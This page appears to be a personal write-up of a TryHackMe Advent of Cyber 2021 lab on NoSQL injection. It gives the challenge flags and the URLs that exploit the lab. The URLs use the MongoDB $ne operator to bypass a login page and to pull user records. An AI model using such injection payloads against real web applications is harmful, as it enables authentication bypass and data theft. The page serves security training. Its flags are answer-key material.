LogoLogo
  • 🤩Welcome!
  • Buffer overflow
    • Remote Buffer Overflow
      • Crashing the Application
      • Controlling the EIP
      • Finding Bad Characters
      • Finding a Return Address
      • Generating Shellcode
      • Getting a Shell
  • Wireless Penetration Testing
    • Wifi Pineapple - Tetra
      • Setup
      • Firmware Upgrade
      • Capturing Wireless Handshake
      • Cracking WPA2 Handshake
      • PineAP
      • Modules
  • PortSwigger Labs
    • Authentication
      • Username enumeration via different responses
      • Username enumeration via subtly different responses
      • Username enumeration via response timing
  • TryHackMe
    • 🎄Advent of Cyber 3 (2021)
      • [Day 1] Save The Gifts
      • [Day 2] Elf HR Problems
      • [Day 3] Christmas Blackout
      • [Day 4] Santa's Running Behind
      • [Day 5] Pesky Elf Forum
      • [Day 6] Patch Management Is Hard
      • [Day 7] Migration Without Security
      • [Day 8] Santa's Bag of Toys
      • [Day 9] Where Is All This Data Going
  • Google Cloud Computing
    • ☁️Cloud Computing Fundamentals
      • Getting Started with Cloud Shell and gcloud
      • Creating a Virtual Machine
      • App Engine: Qwik Start - Python
      • Cloud Functions: Qwik Start - Command Line
      • Kubernetes Engine: Qwik Start
      • Set Up Network and HTTP Load Balancers
Powered by GitBook
On this page

Was this helpful?

  1. TryHackMe
  2. Advent of Cyber 3 (2021)

[Day 7] Migration Without Security

{Web Exploitation = NoSQLi}

Previous[Day 6] Patch Management Is HardNext[Day 8] Santa's Bag of Toys

Last updated 3 years ago

Was this helpful?

Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag.

Interact with the MongoDB server to find the flag. What is the flag?

  • THM{8814a5e6662a9763f7df23ee59d944f9}

The following page is being served on port 80/HTTP

Useful MongoDB Operators

$eq - matches records that equal to a certain value

$ne - matches records that are not equal to a certain value

$gt - matches records that are greater than a certain value.

$where - matches records based on Javascript condition

$exists - matches records that have a certain field

$regex - matches records that satisfy certain regular expressions.

Bypassing the login page is as simple as using the $ne operator on the password field.

We're in.

THM{b6b304f5d5834a4d089b570840b467a8}

10.10.121.120/search?username[$ne]=admin&role=guest

Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

  • THM{2ec099f2d602cc4968c5267970be1326} 

http://10.10.121.120/search?username=mcskidy&role[$ne]=guest

Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

  • ID:6184f516ef6da50433f100f4:mcskidy:admin

🎄